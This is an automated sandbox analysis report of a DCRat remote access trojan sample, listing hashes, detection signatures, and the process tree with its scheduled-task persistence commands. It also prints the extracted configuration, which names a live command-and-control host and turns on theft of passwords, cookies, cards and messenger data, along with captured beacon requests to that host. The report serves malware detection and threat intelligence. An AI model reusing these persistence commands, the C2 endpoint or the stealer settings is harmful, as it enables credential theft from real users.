Edit tour

Windows Analysis Report
QT4aLb3P98.exe

Overview

General Information

Sample name:	QT4aLb3P98.exe renamed because original name is a hash value
Original sample name:	1a9c19cd373f9ce0642f18f6965521b3.exe
Analysis ID:	1483427
MD5:	1a9c19cd373f9ce0642f18f6965521b3
SHA1:	64bc66f217964ab7310084cc9b2e4ef72ea7156b
SHA256:	82bea7c0254a8a0b675f8702eb3dafbbcc608bdb672738d159b33ae699a4d5bb
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DCRat

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Execution from Suspicious Folder

Uses schtasks.exe or at.exe to add and modify task schedules

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

QT4aLb3P98.exe (PID: 6872 cmdline: "C:\Users\user\Desktop\QT4aLb3P98.exe" MD5: 1A9C19CD373F9CE0642F18F6965521B3)

schtasks.exe (PID: 3804 cmdline: schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1184 cmdline: schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4924 cmdline: schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1432 cmdline: schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6756 cmdline: schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 11 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7152 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

w32tm.exe (PID: 6756 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

wRRcPdViqk.exe (PID: 7252 cmdline: "C:\Windows\Media\Sonata\wRRcPdViqk.exe" MD5: 1A9C19CD373F9CE0642F18F6965521B3)

wRRcPdViqk.exe (PID: 5696 cmdline: C:\Windows\Media\Sonata\wRRcPdViqk.exe MD5: 1A9C19CD373F9CE0642F18F6965521B3)

wRRcPdViqk.exe (PID: 5104 cmdline: C:\Windows\Media\Sonata\wRRcPdViqk.exe MD5: 1A9C19CD373F9CE0642F18F6965521B3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"o\":\")\",\"L\":\"`\",\"t\":\" \",\"F\":\"_\",\"p\":\"!\",\"A\":\",\",\"w\":\"*\",\"5\":\"#\",\"l\":\"~\",\"H\":\"@\",\"Y\":\"|\",\"I\":\"%\",\"a\":\"<\",\"O\":\".\",\"m\":\";\",\"9\":\"&\",\"h\":\"-\",\"y\":\"^\",\"W\":\">\",\"T\":\"(\",\"i\":\"$\"}", "PCRT": "{\"l\":\"@\",\"V\":\"|\",\"Q\":\".\",\"0\":\"^\",\"X\":\",\",\"U\":\"!\",\"m\":\";\",\"8\":\"-\",\"z\":\"&\",\"B\":\"(\",\"J\":\"`\",\"Y\":\")\",\"1\":\"$\",\"w\":\"%\",\"n\":\"<\",\"d\":\"#\",\"N\":\"*\",\"K\":\"_\",\"h\":\">\",\"S\":\"~\",\"F\":\" \"}", "TAG": "", "MUTEX": "DCR_MUTEX-YA1pCSAA9lv2Umt03noS", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "H2": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "T": "0"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1687936780.0000000003429000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000C.00000002.1818454348.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000B.00000002.1716375349.00000000024D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1687936780.0000000003271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000002.1774437286.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: QT4aLb3P98.exe PID: 6872	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wRRcPdViqk.exe PID: 5696	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wRRcPdViqk.exe PID: 5104	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: wRRcPdViqk.exe PID: 7252	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Media\Sonata\wRRcPdViqk.exe, CommandLine: C:\Windows\Media\Sonata\wRRcPdViqk.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Media\Sonata\wRRcPdViqk.exe, NewProcessName: C:\Windows\Media\Sonata\wRRcPdViqk.exe, OriginalFileName: C:\Windows\Media\Sonata\wRRcPdViqk.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\Media\Sonata\wRRcPdViqk.exe, ProcessId: 5696, ProcessName: wRRcPdViqk.exe

Snort Signatures

⊘No Snort rule has matched

Suricata Signatures

ET MALWARE DCRAT Activity (GET) - Source IP: 192.168.2.4 - Destination IP: 141.8.192.103

Timestamp:	2024-07-27T13:07:02.639541+0200
SID:	2034194
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T13:07:19.875048+0200
SID:	2022930
Source Port:	443
Destination Port:	49731
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T13:07:26.259809+0200
SID:	2022930
Source Port:	443
Destination Port:	56108
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.4

Timestamp:	2024-07-27T13:07:27.325367+0200
SID:	2022930
Source Port:	443
Destination Port:	56109
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: QT4aLb3P98.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://a1009608.xsph.ru/	Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF	Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru	Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/@=MjZ2QmMzETM	Avira URL Cloud: Label: malware
Source: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984
Source: C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	Avira: detection malicious, Label: HEUR/AGEN.1323984

Found malware configuration

Source: 00000000.00000002.1688308009.000000001327F000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"SCRT": "{\"o\":\")\",\"L\":\"`\",\"t\":\" \",\"F\":\"_\",\"p\":\"!\",\"A\":\",\",\"w\":\"*\",\"5\":\"#\",\"l\":\"~\",\"H\":\"@\",\"Y\":\"|\",\"I\":\"%\",\"a\":\"<\",\"O\":\".\",\"m\":\";\",\"9\":\"&\",\"h\":\"-\",\"y\":\"^\",\"W\":\">\",\"T\":\"(\",\"i\":\"$\"}", "PCRT": "{\"l\":\"@\",\"V\":\"|\",\"Q\":\".\",\"0\":\"^\",\"X\":\",\",\"U\":\"!\",\"m\":\";\",\"8\":\"-\",\"z\":\"&\",\"B\":\"(\",\"J\":\"`\",\"Y\":\")\",\"1\":\"$\",\"w\":\"%\",\"n\":\"<\",\"d\":\"#\",\"N\":\"*\",\"K\":\"_\",\"h\":\">\",\"S\":\"~\",\"F\":\" \"}", "TAG": "", "MUTEX": "DCR_MUTEX-YA1pCSAA9lv2Umt03noS", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "H2": "http://a1009608.xsph.ru/@=MjZ2QmMzETM", "T": "0"}

Multi AV Scanner detection for domain / URL

Source: a1009608.xsph.ru	Virustotal: Detection: 12%	Perma Link
Source: http://a1009608.xsph.ru	Virustotal: Detection: 12%	Perma Link
Source: http://a1009608.xsph.ru/	Virustotal: Detection: 12%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	ReversingLabs: Detection: 84%
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	Virustotal: Detection: 68%	Perma Link
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	ReversingLabs: Detection: 84%
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe	Virustotal: Detection: 68%	Perma Link

Multi AV Scanner detection for submitted file

Source: QT4aLb3P98.exe	ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe	Virustotal: Detection: 68%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: QT4aLb3P98.exe

Joe Sandbox ML: detected

Source: QT4aLb3P98.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe			Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3			Jump to behavior

Source: QT4aLb3P98.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://a1009608.xsph.ru/@=MjZ2QmMzETM

Source: Joe Sandbox View	IP Address: 141.8.192.103 141.8.192.103
Source: Joe Sandbox View	IP Address: 141.8.192.103 141.8.192.103

Source: Joe Sandbox View

ASN Name: SPRINTHOSTRU SPRINTHOSTRU

Source: global traffic	HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ru

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470d5=3fcabe54654b82392e895aa4c4e7b395&a9d3e3cdc71e35b96ad20cf4efbd4740=gY3MmNzQjNkhTNzE2M1YWZwAjZ1QTZ0ITO1Y2NmVmY4YDNwEzYjZmM&rgHy1i1qGuabZNE=KZftVioRcmp7cZPF HTTP/1.1Accept: /Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: a1009608.xsph.ru

Source: global traffic

DNS traffic detected: DNS query: a1009608.xsph.ru

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 27 Jul 2024 11:07:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69

Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002660000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1009608.xsph.ru
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002625000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1009608.xsph.ru/
Source: wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.000000000268B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://a1009608.xsph.ru/1132d6f3.php?rgHy1i1qGuabZNE=KZftVioRcmp7cZPF&3f1b5944bfad4eb3eab4f036622470
Source: QT4aLb3P98.exe, 00000000.00000002.1687936780.000000000344F000.00000004.00000800.00020000.00000000.sdmp, wRRcPdViqk.exe, 0000000B.00000002.1716375349.0000000002639000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
